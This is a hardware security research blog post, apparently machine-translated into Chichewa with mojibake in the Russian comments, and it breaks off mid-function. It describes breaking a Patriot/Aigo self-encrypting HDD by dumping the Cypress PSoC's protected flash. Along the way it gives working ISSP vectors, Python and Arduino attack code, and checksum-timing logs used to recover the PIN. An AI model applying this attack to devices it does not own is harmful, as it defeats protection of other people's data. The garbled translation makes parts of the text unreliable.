Pulogalamu ya ProHoster > Blog > Ulamuliro > Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

Ili ndi gawo lachiwiri komanso lomaliza la nkhaniyi yokhudza kubera ma drive odzitsekera akunja. Ndiroleni ndikukumbutseni kuti mnzanga posachedwapa wandibweretsera Patriot (Aigo) SK8671 hard drive, ndipo ndinaganiza zoisintha, ndipo tsopano ndikugawana zomwe zinatulukamo. Musanawerenge zambiri, onetsetsani kuti mwawerenga gawo loyamba zolemba.

4. Timayamba kutenga kutaya kuchokera mkati mwa PSoC flash drive
5. protocol ya ISSP
- 5.1. Kodi ISSP ndi chiyani
- 5.2. Demystifying Vectors
- 5.3. Kulumikizana ndi PSoC
- 5.4. Kuzindikiritsa ma regista pa-chip
- 5.5. Zida zachitetezo
6. Kuukira koyamba (kolephera): ROMX
7. Kuukira Kwachiwiri: Cold Boot Tracing
- 7.1. Kukhazikitsa
- 7.2. Kuwerenga zotsatira
- 7.3. Kumanganso bayinare kung'anima
- 7.4. Kupeza adilesi yosungira PIN
- 7.5. Kutenga tayira chipika nambala 126
- 7.6. PIN code kuchira
8. Chotsatira ndi chiyani?
9. Kutsiliza

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC


4. Timayamba kutenga kutaya kuchokera mkati mwa PSoC flash drive

Chifukwa chake, chilichonse chikuwonetsa (monga tidakhazikitsira [gawo loyamba]()) kuti PIN code imasungidwa mukuya kwa PSoC. Choncho, tiyenera kuwerenga kuya kwa flash uku. Pamaso pa ntchito zofunika:

  • kulamulira "kulumikizana" ndi microcontroller;
  • pezani njira yowonera ngati "kulumikizana" uku kumatetezedwa ku kuwerenga kuchokera kunja;
  • kupeza njira yolambalala chitetezo.

Pali malo awiri pomwe ndizomveka kuyang'ana PIN yovomerezeka:

  • mkati kung'anima kukumbukira;
  • SRAM, pomwe pin code imatha kusungidwa kuti ifananize ndi ma pin code omwe wogwiritsa ntchito amalowetsa.

Kuyang'ana m'tsogolo, ndiwona kuti ndidakwanitsabe kutaya mkati mwa PSoC flash drive - kudutsa njira yake yachitetezo pogwiritsa ntchito zida za Hardware zomwe zimatchedwa "cold boot tracing" - nditasintha zomwe sizinalembedwe za protocol ya ISSP. Izi zinandilola kutaya PIN code yeniyeni.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

Khodi yomaliza ya pulogalamu:

5. protocol ya ISSP

5.1. Kodi ISSP ndi chiyani

"Kulankhulana" ndi microcontroller kungatanthauze zinthu zosiyanasiyana: kuchokera ku "wogulitsa kwa wogulitsa" kuti agwirizane pogwiritsa ntchito serial protocol (mwachitsanzo, ICSP ya Microchip's PIC).

Cypress ili ndi protocol yakeyake ya izi, yotchedwa ISSP (in-system serial programming protocol), yomwe imafotokozedwa pang'ono specifications luso. Mtengo wa US7185162 imaperekanso zina. Palinso chofanana ndi OpenSource chotchedwa HSSP (tigwiritsa ntchito pakapita nthawi). ISSP imagwira ntchito motere:

  • yambitsaninso PSoC;
  • kutulutsa nambala yamatsenga ku pini ya data ya PSoC iyi; kulowa kunja mapulogalamu mumalowedwe;
  • tumizani malamulo, omwe ndi zingwe zazitali zotchedwa "vectors".

Zolemba za ISSP zimatanthauzira ma vector awa pamalamulo ochepa chabe:

  • Choyamba - 1
  • Choyamba - 2
  • Yambitsani-3 (zosankha za 3V ndi 5V)
  • ID-KUKHALA
  • WERENGANI-ID-MAWU
  • SET-BLOCK-NUM: 10011111010dddddddd111, pomwe dddddddd=block #
  • KUFUTA KWAMBIRI
  • PROGRAM-LEKANI
  • VERIFY-KUKHALA
  • WERENGANI-BYTE: 10110aaaaaZDDDDDDDDZ1, pomwe DDDDDDDD = data kunja, aaaaaa = adilesi (6 bits)
  • WRITE-BYTE: 10010aaaaaaddddddd111, where dddddddd = data in, aaaaaa = adilesi (6 bits)
  • ZOKHUDZA
  • CHECKSUM-KUKHALA
  • WERENGANI-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDDDZ1, kumene DDDDDDDDDDDDDDDDDD = deta yatuluka: checksum ya chipangizo
  • FUTA BLOG

Mwachitsanzo, vekitala ya Initialize-2:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Ma vector onse ali ndi kutalika kofanana: 22 bits. Zolemba za HSSP zili ndi zina zowonjezera pa ISSP: "Veta ya ISSP sichake koma kungotsatizana komwe kumayimira malangizo angapo."

5.2. Demystifying Vectors

Tiye tione zimene zikuchitika apa. Poyambirira, ndimaganiza kuti ma vector omwewo anali matembenuzidwe a M8C yaiwisi, koma nditayang'ana lingaliro ili, ndidapeza kuti ma opcode amachitidwewo sanagwirizane.

Kenako ndidatsegula google pa vector pamwambapa ndipo ndidawona izi Kafukufuku amene wolemba, ngakhale kuti sanafotokoze mwatsatanetsatane, amapereka malangizo othandiza: "Langizo lirilonse limayamba ndi zidutswa zitatu zomwe zimagwirizana ndi chimodzi mwa mamnemonics anayi (kuwerenga kuchokera ku RAM, kulemba ku RAM, kuwerenga kaundula, kulemba kaundula). Kenako pali ma adilesi 8, otsatiridwa ndi ma data 8 (werengani kapena lembani) ndipo pomaliza amasiya atatu. ”

Kenako ndinatha kutola mfundo zothandiza kwambiri pagawo la Supervisory ROM (SROM). Buku laukadaulo. SROM ndi ROM yolimba kwambiri mu PSoC yomwe imapereka ntchito zofunikira (mofanana ndi Syscall) pamakhodi apulogalamu omwe akuyenda mu malo ogwiritsa ntchito:

  • 00h: SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: EraseBlock
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Sinthani0
  • 09h: Sinthani1

Poyerekeza mayina a vector ku ntchito za SROM, titha kupanga mapu osiyanasiyana omwe amathandizidwa ndi protocol iyi ku magawo omwe akuyembekezeredwa a SROM. Chifukwa cha izi, titha kudziwa magawo atatu oyamba a ma vector a ISSP:

  • 100 => "mzere"
  • 101 => "rdmem"
  • 110 => "Zolakwika"
  • 111 => "kubwerera"

Komabe, kumvetsetsa kwathunthu kwa njira za pa-chip kumatha kupezeka pokhapokha polumikizana mwachindunji ndi PSoC.

5.3. Kulumikizana ndi PSoC

Popeza Dirk Petrautsky ali kale kunyamula Khodi ya HSSP ya Cypress pa Arduino, ndidagwiritsa ntchito Arduino Uno kulumikizana ndi cholumikizira cha ISSP cha bolodi la kiyibodi.

Chonde dziwani kuti mkati mwa kafukufuku wanga, ndidasintha kachidindo ka Dirk pang'ono. Mutha kupeza zosintha zanga pa GitHub: apa ndi zolemba zofananira za Python zolankhulana ndi Arduino, m'malo anga cypress_psoc_tools.

Chifukwa chake, pogwiritsa ntchito Arduino, ndinayamba kugwiritsa ntchito ma vector "ovomerezeka" a "kulumikizana". Ndinayesa kuwerenga ROM yamkati pogwiritsa ntchito lamulo la VERIFY. Monga ndimayembekezera, sindinathe kuchita zimenezi. Mwinamwake chifukwa chakuti ma bits otetezera amawerengedwa amatsegulidwa mkati mwa flash drive.

Kenako ndidapanga ma vector anga osavuta olembera ndikuwerenga kukumbukira / zolembetsa. Chonde dziwani kuti titha kuwerenga SROM yonse ngakhale flash drive imatetezedwa!

5.4. Kuzindikiritsa ma regista pa-chip

Nditayang'ana ma vectors "osungunuka", ndidapeza kuti chipangizocho chimagwiritsa ntchito zolembera zosalembedwa (0xF8-0xFA) kutchula ma M8C opcode, omwe amachitidwa mwachindunji, kudutsa chitetezo. Izi zinandilola kuyendetsa ma opcode osiyanasiyana monga "ADD", "MOV A, X", "PUSH" kapena "JMP". Zikomo kwa iwo (poyang'ana zotsatira zomwe ali nazo pa zolembera) ndinatha kudziwa kuti ndi ziti mwa zolembera zosalembedwa zomwe zinali zolembera nthawi zonse (A, X, SP ndi PC).

Chotsatira chake, code "disassembled" yopangidwa ndi chida cha HSSP_disas.rb ikuwoneka motere (ndinawonjezera ndemanga kuti zimveke):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # сброс Ρ„Π»Π°Π³ΠΎΠ²
[DE C0 1C] wrreg SP (f6), 0x00      # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A     # ΠΎΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ для SSC
[9F 20 7C] wrmem KEY2, 0x03     # Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00     # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... Π΄ΠΎ 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM-ΡƒΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒ для Π²Ρ‹Ρ…ΠΎΠ΄Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…
[DF 26 1C] wrreg opc1 (f9), 0x30        # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID для Π²Ρ‹Π·ΠΎΠ²Π° SSC
[DE 00 DC] wrreg A (f0), 0x06       # Π½ΠΎΠΌΠ΅Ρ€ "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # НСдокуммСнтированная опСрация: Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ внСшний ΠΎΠΏΠΊΠΎΠ΄

5.5. Zida zachitetezo

Pakadali pano nditha kulumikizana kale ndi PSoC, koma ndilibe chidziwitso chodalirika chokhudza chitetezo cha flash drive. Ndinadabwa kwambiri ndi mfundo yakuti Cypress sapereka wogwiritsa ntchito chipangizocho njira iliyonse kuti awone ngati chitetezocho chatsegulidwa. Ndinakumba mozama mu Google kuti ndimvetsetse kuti nambala ya HSSP yoperekedwa ndi Cypress idasinthidwa pambuyo poti Dirk adatulutsa kusintha kwake. Ndipo kenako! Vector yatsopanoyi yawoneka:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # нСизвСстныС Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Ρ‹
[9F E0 1C] wrmem 0xFF, 0x00 # Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # Π½Π΅Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Pogwiritsa ntchito vekitala iyi (onani read_security_data mu psoc.py), timapeza ma bits onse achitetezo mu SRAM pa 0x80, pomwe pali ma bits awiri pa block yotetezedwa.

Zotsatira zake zimakhala zokhumudwitsa: chirichonse chimatetezedwa mu "kulepheretsa kuwerenga ndi kulemba kunja" mode. Choncho, sitingathe kuwerenga chilichonse kuchokera pagalimoto, koma sitingathe kulemba chilichonse (mwachitsanzo, kukhazikitsa ROM dumper kumeneko). Ndipo njira yokhayo yoletsera chitetezo ndikuchotsa chip chonsecho. πŸ™

6. Kuukira koyamba (kolephera): ROMX

Komabe, titha kuyesa chinyengo chotsatirachi: popeza tili ndi kuthekera kochita ma opcode osagwirizana, bwanji osapanga ROMX, yomwe imagwiritsidwa ntchito powerenga flash memory? Njirayi ili ndi mwayi wabwino wopambana. Chifukwa ntchito ya ReadBlock yomwe imawerenga deta kuchokera ku SROM (yomwe imagwiritsidwa ntchito ndi ma vector) imayang'ana ngati imatchedwa ISSP. Komabe, opcode ya ROMX mwachidziwikire sangakhale ndi cheke chotere. Chifukwa chake nayi nambala ya Python (mutawonjezera makalasi othandizira ochepa ku code ya Arduino):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = 0
    write_reg(0xF3, i&0xFF)     # X = 0
    exec_opcodes("x28x30x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print ROM byte

Tsoka ilo code iyi sikugwira ntchito. πŸ™ Kapena m'malo mwake zimagwira ntchito, koma pazotulutsa timapeza ma opcode athu (0x28 0x30 0x40)! Sindikuganiza kuti magwiridwe antchito a chipangizocho ndi gawo lachitetezo chowerengera. Izi zili ngati chinyengo chaumisiri: pochita ma opcode akunja, basi ya ROM imasinthidwa kupita ku buffer kwakanthawi.

7. Kuukira Kwachiwiri: Cold Boot Tracing

Popeza chinyengo cha ROMX sichinagwire ntchito, ndinayamba kuganizira za kusiyana kwina kwachinyengo ichi - chofotokozedwa m'bukuli. "Kuwunikira Kwambiri pa Chitetezo cha Firmware ya Microcontroller".

7.1. Kukhazikitsa

Zolemba za ISSP zimapereka vector yotsatira ya CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Izi zimatcha SROM ntchito 0x07, monga momwe zalembedwera muzolemba (italics mine):

Ntchito yotsimikizira cheke. Imawerengera cheke cha 16-bit cha kuchuluka kwa midadada yodziwika ndi ogwiritsa ntchito mu flash bank imodzi, kuyambira paziro. BLOCKID parameter imagwiritsidwa ntchito kudutsa chiwerengero cha midadada yomwe idzagwiritsidwe ntchito powerengera cheke. Mtengo wa "1" umangowerengera cheke pa block zero; pomwe "0" idzapangitsa kuti cheke chonse cha midadada 256 ya banki ya flash iwerengedwe. Chekeni ya 16-bit imabwezedwa kudzera pa KEY1 ndi KEY2. Gawo la KEY1 limasunga ma 8 bits a cheke, ndipo gawo la KEY2 limasunga ma bits 8 apamwamba. Pazida zomwe zili ndi mabanki angapo a Flash, ntchito ya checksum imayitanidwa pa chilichonse padera. Nambala ya banki yomwe idzagwire nayo ntchito imayikidwa ndi kaundula wa FLS_PR1 (pokhazikitsa pang'ono momwemo molingana ndi banki yomwe mukufuna).

Dziwani kuti iyi ndi cheke chosavuta: ma byte amangowonjezeredwa chimodzi pambuyo pa chimzake; palibe zovuta za CRC. Kuphatikiza apo, podziwa kuti maziko a M8C ali ndi kaundula kakang'ono kwambiri, ndimaganiza kuti powerengera cheke, zikhalidwe zapakatikati zidzalembedwa pazosintha zomwezo zomwe pamapeto pake zidzatuluka: KEY1 (0xF8) / KEY2 ( 0xf9 pa.

Chifukwa chake m'malingaliro anga kuwukira kwanga kumawoneka motere:

  1. Timalumikizana kudzera pa ISSP.
  2. Timayamba kuwerengetsa cheke pogwiritsa ntchito vekita ya CHECKSUM-SETUP.
  3. Timayambiranso purosesa pambuyo pa nthawi yodziwika T.
  4. Timawerenga RAM kuti tipeze cheke C.
  5. Bwerezani masitepe 3 ndi 4, ndikuwonjezera T pang'ono nthawi iliyonse.
  6. Timapezanso zambiri kuchokera pagalimoto yong'anima pochotsa cheke C yapitayi kuchokera pakali pano.

Komabe, pali vuto: vekitala ya Initialize-1 yomwe tiyenera kutumiza ikayambiranso imalemba KEY1 ndi KEY2:

1100101000000000000000  # Магия, пСрСводящая PSoC Π² Ρ€Π΅ΠΆΠΈΠΌ программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½Π°Ρ сумма пСрСзаписываСтся здСсь
[9F 20 7C] wrmem KEY2, 0x03 # и здСсь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Khodi iyi imachotsa cheke chathu chamtengo wapatali poyitana Calibrate1 (ntchito ya SROM 9)... Mwina tingangotumiza nambala yamatsenga (kuyambira pachiyambi cha code pamwambapa) kuti tilowetse ndondomeko ya mapulogalamu, ndiyeno werengani SRAM? Ndipo inde, zimagwira ntchito! Khodi ya Arduino yomwe imagwiritsa ntchito izi ndiyosavuta:

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

  1. Werengani checkum_delay.
  2. Thamangani kuwerengetsa cheke (send_checksum_v).
  3. Dikirani kwa nthawi yodziwika; poganizira zovuta zotsatirazi:
    • Ndidataya nthawi yayitali mpaka ndidazindikira zomwe zidachitika kuchedwaMasekondi imagwira ntchito moyenera pokhapokha ndikuchedwa kosapitilira 16383 ΞΌs;
    • kenako ndinaphanso nthawi yofananayo mpaka nditazindikira kuti kuchedwaMicroseconds, ngati 0 iperekedwa kwa icho ngati cholowetsa, imagwira ntchito molakwika!
  4. Yambitsaninso PSoC kukhala pulogalamu yamapulogalamu (timangotumiza nambala yamatsenga, osatumiza ma vector oyambitsa).

Khodi yomaliza ku Python:

for delay in range(0, 150000):  # Π·Π°Π΄Π΅Ρ€ΠΆΠΊΠ° Π² микросСкундах
    for i in range(0, 10):      # количСство считывания для ΠΊΠ°ΠΆΠ΄ΠΎΠΉΠΈΠ· Π·Π°Π΄Π΅Ρ€ΠΆΠ΅ΠΊ
        try:
            reset_psoc(quiet=True)  # ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ° ΠΈ Π²Ρ…ΠΎΠ΄ Π² Ρ€Π΅ΠΆΠΈΠΌ программирования
            send_vectors()      # ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠ° ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·ΠΈΡ€ΡƒΡŽΡ‰ΠΈΡ… Π²Π΅ΠΊΡ‚ΠΎΡ€ΠΎΠ²
            ser.write("x85"+struct.pack(">I", delay)) # Π²Ρ‹Ρ‡ΠΈΡΠ»ΠΈΡ‚ΡŒ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΡƒΡŽ сумму + ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒΡΡ послС Π·Π°Π΄Π΅Ρ€ΠΆΠΊΠΈ
            res = ser.read(1)       # ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΡŒ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ ΠΏΠΎΡ€Ρ‚
            continue
        print "%05d %02X %02X %02X" % (delay,      # ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ RAM-Π±Π°ΠΉΡ‚Ρ‹
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

Mwachidule, zomwe code iyi imachita:

  1. Imayambiranso PSoC (ndikutumiza nambala yamatsenga).
  2. Imatumiza ma vector onse oyambitsa.
  3. Imayimbira ntchito ya Arduino Cmnd_STK_START_CSUM (0x85), pomwe kuchedwa kwa ma microseconds kumadutsa ngati parameter.
  4. Amawerenga cheke (0xF8 ndi 0xF9) ndi kaundula wosalembedwa 0xF1.

Khodi iyi imachitidwa nthawi 10 mu 1 microsecond. 0xF1 ikuphatikizidwa pano chifukwa inali kaundula yokhayo yomwe idasintha powerengera cheke. Mwina ndi mtundu wina wakusintha kwakanthawi kogwiritsidwa ntchito ndi masamu a masamu. Zindikirani kuthyolako koyipa komwe ndimagwiritsa ntchito kukhazikitsanso Arduino pogwiritsa ntchito picocom pomwe Arduino imasiya kuwonetsa zizindikiro zamoyo (osadziwa chifukwa chake).

7.2. Kuwerenga zotsatira

Zotsatira za Python script zikuwoneka motere (zosavuta kuwerenga):

DELAY F1 F8 F9  # F1 – Π²Ρ‹ΡˆΠ΅ΡƒΠΏΠΎΠΌΡΠ½ΡƒΡ‚Ρ‹ΠΉ нСизвСстный рСгистр
                  # F8 младший Π±Π°ΠΉΡ‚ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠΉ суммы
                  # F9 ΡΡ‚Π°Ρ€ΡˆΠΈΠΉ Π±Π°ΠΉΡ‚ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠΉ суммы

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½Π°Ρ сумма сбрасываСтся Π² 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1-ΠΉ Π±Π°ΠΉΡ‚: 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2-ΠΉ Π±Π°ΠΉΡ‚: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # понятия Π½Π΅ имСю, Ρ‡Ρ‚ΠΎ здСсь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # Π‘Π½ΠΎΠ²Π° E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Π₯ΠΌΠΌΠΌΠΌΠΌΠΌ
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # А, дошло! Π’ΠΎΡ‚ ΠΎΠ½ ΠΆΠ΅ пСрСнос Π² ΡΡ‚Π°Ρ€ΡˆΠΈΠΉ Π±Π°ΠΉΡ‚
00063 01 17 01
[...]
00075 CC 17 01  # Π˜Ρ‚Π°ΠΊ, 0x117-0xE7: 0x30

Izi zikunenedwa, tili ndi vuto: popeza tikugwira ntchito ndi cheke chenicheni, null byte sisintha mtengo wowerengedwa. Komabe, popeza ndondomeko yonse yowerengera (8192 byte) imatenga masekondi a 0,1478 (ndi kusinthasintha pang'ono nthawi iliyonse yomwe ikuyendetsedwa), zomwe zimafanana ndi pafupifupi 18,04 ΞΌs pa byte, tingagwiritse ntchito nthawiyi kuti tiwone mtengo wa checksum pa nthawi yoyenera. Pakuthamanga koyamba, zonse zimawerengedwa mosavuta, chifukwa nthawi yowerengera nthawi zonse imakhala yofanana. Komabe, kutha kwa kutaya uku sikulondola kwenikweni chifukwa "zopatuka zazing'ono" pamayendedwe aliwonse zimawonjezera kuti zikhale zofunikira:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Ndiko kutaya 10 pakuchedwa kwa microsecond iliyonse. Nthawi yonse yogwiritsira ntchito kutaya ma byte onse 8192 a flash drive ndi pafupifupi maola 48.

7.3. Kumanganso bayinare kung'anima

Sindinamalize kulemba kachidindo kamene kangakonzenso kachidindo ka pulogalamu ya flash drive, poganizira zopatuka nthawi zonse. Komabe, ndabwezeretsa kale chiyambi cha code iyi. Kuti nditsimikizire kuti ndachichita bwino, ndidachichotsa pogwiritsa ntchito m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

Zikuwoneka zomveka!

7.4. Kupeza adilesi yosungira PIN

Tsopano popeza titha kuwerenga cheke panthawi yomwe tikufuna, titha kuyang'ana momwe zimasinthira komanso pomwe ti:

  • lowetsani PIN code yolakwika;
  • sintha pin code.

Choyamba, kuti ndipeze adilesi yosungirako, ndidatenga dambo la checksum mu 10 ms increments nditayambiranso. Kenako ndinalowetsa PIN yolakwika ndikuchitanso chimodzimodzi.

Zotsatira zake sizinali zosangalatsa kwenikweni, popeza panali zosintha zambiri. Koma pamapeto ndidatha kudziwa kuti cheke chasintha penapake pakati pa 120000 Β΅s ndi 140000 Β΅s akuchedwa. Koma "pincode" yomwe ndidawonetsa pamenepo inali yolakwika kwathunthu - chifukwa cha kuchedwa kwa Microseconds, yomwe imachita zinthu zachilendo 0 ikadutsa.

Kenako, nditakhala pafupifupi maola atatu, ndidakumbukira kuti pulogalamu ya SROM yoyimba CheckSum imalandira mkangano ngati cholowa chomwe chimatchula kuchuluka kwa midadada ya cheke! Kuti. titha kuyika mosavuta adilesi yosungira ya PIN code ndi kauntala "zoyeserera molakwika", molondola mpaka 3-byte block.

Kuthamanga kwanga koyamba kunatulutsa zotsatirazi:

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

Kenako ndidasintha nambala ya PIN kuchoka ku "123456" kukhala "1234567" ndikupeza:

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

Chifukwa chake, nambala ya PIN ndi zoyeserera zolakwika zikuwoneka kuti zasungidwa mu block No. 126.

7.5. Kutenga tayira chipika nambala 126

Block #126 iyenera kupezeka penapake mozungulira 125x64x18 = 144000ΞΌs, kuyambira koyambira kuwerengetsa cheke, pakutaya kwanga konse, ndipo zikuwoneka zomveka. Kenako, nditatha kusefa pamanja malo ambiri osavomerezeka (chifukwa cha kuchuluka kwa "zolakwika zazing'ono zanthawi"), ndidapeza ma byte awa (pa latency ya 145527 ΞΌs):

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

Ndizodziwikiratu kuti nambala ya PIN imasungidwa m'njira yosadziwika! Mfundozi, ndithudi, sizinalembedwe mu zizindikiro za ASCII, koma momwe zimakhalira, zimasonyeza zowerengedwa zomwe zatengedwa pa kiyibodi ya capacitive.

Pomaliza, ndidayesanso mayeso ena kuti ndipeze pomwe zida zoyeserera zoyipa zidasungidwa. Zotsatira zake ndi izi:

Kubweza ndi kuthyola Aigo yodzipangira yokha HDD drive. Gawo 2: Kutaya ku Cypress PSoC

0xFF - amatanthauza "kuyesa 15" ndipo imachepa ndi kuyesa kulikonse komwe kwalephera.

7.6. PIN code kuchira

Nayi code yanga yoyipa yomwe imayika pamwambapa palimodzi:

def dump_pin():
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
